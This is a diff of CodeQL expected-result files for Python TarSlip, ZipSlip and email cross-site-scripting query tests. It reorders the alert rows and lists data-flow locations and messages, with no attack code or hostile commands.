ControlFlowNode for tar | -| TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | ControlFlowNode for members | -| TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | -| TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | ControlFlowNode for result | -| TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | edges | TarSlipImprov.py:15:1:15:3 | ControlFlowNode for tar | TarSlipImprov.py:17:5:17:10 | ControlFlowNode for member | provenance | | | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:15:1:15:3 | ControlFlowNode for tar | provenance | | @@ -253,3 +223,33 @@ nodes subpaths | TarSlipImprov.py:39:65:39:67 | ControlFlowNode for tar | TarSlipImprov.py:26:21:26:27 | ControlFlowNode for tarfile | TarSlipImprov.py:36:12:36:17 | ControlFlowNode for result | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | | TarSlipImprov.py:39:65:39:67 | ControlFlowNode for tar | TarSlipImprov.py:26:21:26:27 | ControlFlowNode for tarfile | TarSlipImprov.py:36:12:36:17 | ControlFlowNode for result [List element] | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | +#select +| TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | ControlFlowNode for result | +| TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | ControlFlowNode for members_filter1() | +| TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | +| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | +| TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | ControlFlowNode for members | +| TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | +| TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | ControlFlowNode for result | +| TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected index eecdfd0494fb..6b618335d810 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/ZipSlip.expected @@ -1,9 +1,3 @@ -#select -| zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | file system operation | -| zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | file system operation | -| zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | file system operation | edges | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:36:8:39 | ControlFlowNode for zipf | provenance | | | zipslip_bad.py:8:36:8:39 | ControlFlowNode for zipf | zipslip_bad.py:10:13:10:17 | ControlFlowNode for entry | provenance | | @@ -42,3 +36,9 @@ nodes | zipslip_bad.py:35:9:35:9 | ControlFlowNode for x | semmle.label | ControlFlowNode for x | | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | semmle.label | ControlFlowNode for x | subpaths +#select +| zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:8:10:8:31 | ControlFlowNode for Attribute() | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:11:25:11:29 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:14:10:14:28 | ControlFlowNode for Attribute() | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:17:26:17:30 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:20:10:20:27 | ControlFlowNode for Attribute() | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:23:29:23:33 | ControlFlowNode for entry | file system operation | +| zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:27:10:27:22 | ControlFlowNode for Attribute() | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:30:25:30:25 | ControlFlowNode for x | file system operation | +| zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:34:16:34:28 | ControlFlowNode for Attribute() | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | This unsanitized archive entry, which may contain '..', is used in a $@. | zipslip_bad.py:37:32:37:32 | ControlFlowNode for x | file system operation | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected index 0a7dde1b81de..8f0493b79278 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-079/EmailXss.expected @@ -1,18 +1,3 @@ -#select -| django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | a user-provided value | -| django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | a user-provided value | -| django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | a user-provided value | -| flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | -| smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | -| smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | edges | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:1:19:1:25 | ControlFlowNode for request | provenance | | | flask_mail.py:1:19:1:25 | ControlFlowNode for request | flask_mail.py:13:22:13:28 | ControlFlowNode for request | provenance | | @@ -92,3 +77,18 @@ nodes | smtplib_bad_via_attach.py:23:5:23:8 | ControlFlowNode for html | semmle.label | ControlFlowNode for html | | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | semmle.label | ControlFlowNode for html | subpaths +#select +| django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:14:48:14:82 | ControlFlowNode for Attribute() | a user-provided value | +| django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | django_mail.py:23:30:23:64 | ControlFlowNode for Attribute() | a user-provided value | +| django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | 